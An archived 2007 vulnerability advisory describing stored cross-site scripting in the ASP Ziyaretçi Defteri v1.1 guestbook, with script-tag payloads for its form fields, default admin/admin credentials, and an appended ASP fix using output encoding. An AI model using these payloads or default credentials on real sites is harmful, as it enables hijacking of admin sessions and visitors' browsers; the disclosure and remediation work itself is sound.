aspziy-xss.txt
Posted on 17 July 2007
ASP Ziyaretçi Defteri v1.1 (tr) XSS Vulnerability

#Software: ASP Ziyaretçi Defteri v1.1 (tr)
#download: http://www.aspindir.com/goster/4882
#demo: http://www.hiddenchest.com/kodlarim/ziyaret/
#Found By: GeFORC3 ( G3 )

#Exploit:

1- http://www.example.com/ziyaret/mesaj_formu.asp

Isim (name): <script>alert("G3");</script>
E-posta (e-mail): <script>alert("G3");</script>
Mesajiniz (your message): <script>alert("G3");</script>

Press the "Gönder" (send) button.

2- Yönetici paneli (admin panel): http://www.example.com/ziyaret/default.asp (default user:admin pass:admin)
Press the "gir" (enter) button.
http://www.example.com/default.asp?islem=login --> XSS code runs

This XSS works in the Yönetici Paneli (admin panel) of the ASP Ziyaretçi Defteri v1.1 (tr) script.
If the admin approves (activates) your message, the XSS code runs on the main page of ASP Ziyaretçi Defteri v1.1 (the guestbook): http://example.com/ziyaret/ziyaretci_mesajlari.asp

WwW.GeFORC3.Org | WwW.HeykirBlog.Org | WwW.NetKaBus.Com
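Added example, not part of the original advisory and not the guestbook's own code: the stored XSS described above is closed by HTML-encoding the Isim, E-posta and Mesajiniz values wherever they are written into a page, in the admin panel and in ziyaretci_mesajlari.asp alike. The helper names (H, IsPlausibleEmail, RenderEntry) and the sample row are assumptions made for illustration; the advisory does not show the script's real variable or column names.

```asp
<%
' Vulnerable pattern (what the advisory implies): a stored field is
' concatenated into the page verbatim, e.g.
'   Response.Write "<b>" & isim & "</b>"

' Output side: encode every stored value at the moment it is written.
Function H(value)
    If IsNull(value) Then
        H = ""
    Else
        ' Server.HTMLEncode turns < > & " into HTML entities.
        H = Server.HTMLEncode(CStr(value))
    End If
End Function

' Input side (defence in depth for the form handler): reject values
' that cannot be an e-mail address before they are stored.
Function IsPlausibleEmail(value)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$"
    IsPlausibleEmail = re.Test(CStr(value))
    Set re = Nothing
End Function

' Renders one guestbook entry; used by both the admin listing and the
' public page so neither context receives raw markup.
Sub RenderEntry(isim, eposta, mesaj)
    Response.Write "<div class=""entry"">"
    Response.Write "<b>" & H(isim) & "</b> "
    Response.Write "&lt;" & H(eposta) & "&gt;"
    ' Encode first, then restore line breaks as <br>.
    Response.Write "<p>" & Replace(H(mesaj), vbCrLf, "<br>") & "</p>"
    Response.Write "</div>"
End Sub

' Constructed sample row using the payload from the advisory.
Dim payload
payload = "<script>alert(""G3"");</script>"

If Not IsPlausibleEmail(payload) Then
    Response.Write "<p>E-posta rejected at submission.</p>"
End If

' Even if such a row is already in the database, it is rendered as text.
RenderEntry payload, payload, payload
%>
```

Rows stored before the fix stay in the database unchanged, which is why the encoding has to happen at output time rather than only at submission.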